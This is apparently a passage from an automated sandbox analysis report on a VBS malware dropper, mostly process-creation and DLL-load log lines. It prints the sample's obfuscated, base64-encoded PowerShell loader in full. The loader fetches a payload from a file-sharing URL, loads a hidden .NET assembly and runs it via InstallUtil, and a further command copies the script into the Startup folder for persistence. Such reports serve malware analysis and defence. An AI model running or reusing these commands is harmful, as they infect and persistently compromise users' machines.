3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                        Data Obfuscation

                        barindex
